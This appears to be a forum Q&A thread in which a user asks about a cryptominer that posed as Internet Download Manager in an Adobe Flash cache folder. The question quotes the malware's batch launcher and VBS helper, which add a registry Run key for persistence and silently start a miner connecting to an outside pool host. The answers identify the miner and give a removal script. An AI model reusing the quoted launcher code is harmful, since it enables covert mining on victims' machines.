-2

My system was really slow one morning. Task manager showed that Internet Download Manager was running even though I never install it. I found it's location in "users/(my account)/appdata/roaming/adobe/flashplayer/purecache". It was taking quite a bit of the CPU.

A search on the net showed that it was probably some kind of malware script that was running. It started itself every time I booted up in the morning through an entry in the registry. I don't know how long I've had it on my system.

The bat file that started it was:

@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x

The vbs script file in the same folder as the bat file was:

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

I have since removed all of the entries from my system, but am concerned about what may have been happening, as I don't know how long this has been on my system.

I know this is a trojan of some kind. But could someone please interpret the bat and script files for me and what information these are sending to ns1.eaglecould.su.

Thank you

edtheprogrammerguy
  • 5,957
  • 6
  • 28
  • 47
user3915638
  • 1
  • 1
  • There is no clue what that "IDMan.exe" could do, I can see how it managed to start each time - modifying registry entry `HKCU\software\microsoft\windows\currentversion\run` (this is where I look when I want to know what starts with the system). – firda Aug 06 '14 at 18:47

2 Answers2

1
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Users\David Candy>nslookup -type=all ns1.eaglecloud.su
Server:  vodafonemobile.vmb
Address:  192.168.1.1

Non-authoritative answer:
ns1.eaglecloud.su       internet address = 95.47.160.203

(root)  ??? unknown type 41 ???

C:\Users\David Candy>nslookup -type=mx ns1.eaglecloud.su
Server:  vodafonemobile.vmb
Address:  192.168.1.1

eaglecloud.su
        primary name server = fred.ns.cloudflare.com
        responsible mail addr = dns.cloudflare.com
        serial  = 2015717786
        refresh = 10000 (2 hours 46 mins 40 secs)
        retry   = 2400 (40 mins)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)
(root)  ??? unknown type 41 ???

C:\Users\David Candy>nslookup -type=mx cloudflare.com
Server:  vodafonemobile.vmb
Address:  192.168.1.1

Non-authoritative answer:
cloudflare.com  MX preference = 30, mail exchanger = alt2.aspmx.l.google.com
cloudflare.com  MX preference = 40, mail exchanger = aspmx2.googlemail.com
cloudflare.com  MX preference = 50, mail exchanger = aspmx3.googlemail.com
cloudflare.com  MX preference = 10, mail exchanger = aspmx.l.google.com
cloudflare.com  MX preference = 20, mail exchanger = alt1.aspmx.l.google.com

aspmx2.googlemail.com   internet address = 74.125.193.26
aspmx3.googlemail.com   internet address = 74.125.196.26
aspmx.l.google.com      internet address = 74.125.25.26
alt1.aspmx.l.google.com internet address = 74.125.193.27
alt2.aspmx.l.google.com internet address = 74.125.196.27
(root)  ??? unknown type 41 ???

I'd complain to both Cloudflare and Google about it as they are using their infrastructure.

Noodles
  • 1,981
  • 1
  • 11
  • 4
  • Google might stop providing email services, but from what I’ve heard, [CloudFlare doesn’t care](http://krebsonsecurity.com/2014/02/the-new-normal-200-400-gbps-ddos-attacks/) ([2](http://blog.cloudflare.com/thoughts-on-abuse)). – icktoofay Aug 07 '14 at 04:50
1

Sorry to awake an ancient topic but I have had the same issue. I have a solution though. It's not a Trojan fortunately.

This malware impersonates an Adobe updater utility. However, Adobe always digitally sign their production programs. It is a bitcoin miner. I found this out by looking up the stratum+tcp protocol which it uses to communicate with the internet. This which returned a pageful of results regarding bitcoin miners.

What the batch file actually does is create a new entry in the registry, for the miner to automatically start when you log on. This miner uses your CPU power to mine hashes for Bitcoin, an online currency, similar to how your country would print paper money. As far as I can tell, it doesn't touch any personal files.

Removing both the registry entry and the related files killed it for me. Below is a batch script which does all that for you.

@echo off
echo Starting removal. Please make sure that you've closed IDMan.exe
pause
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeFlashPlayer /f
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.bat"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe"
del "%appdata%\Adobe\Flash Player\PureCache\libcurl.dll"
del "%appdata%\Adobe\Flash Player\PureCache\pthreadGC2.dll"
del "%appdata%\Adobe\Flash Player\PureCache\zlib1.dll"
echo Removal complete.
pause

Paste that into a batch file and you should be good to go.

TheJamaicanGuy
  • 31
  • 5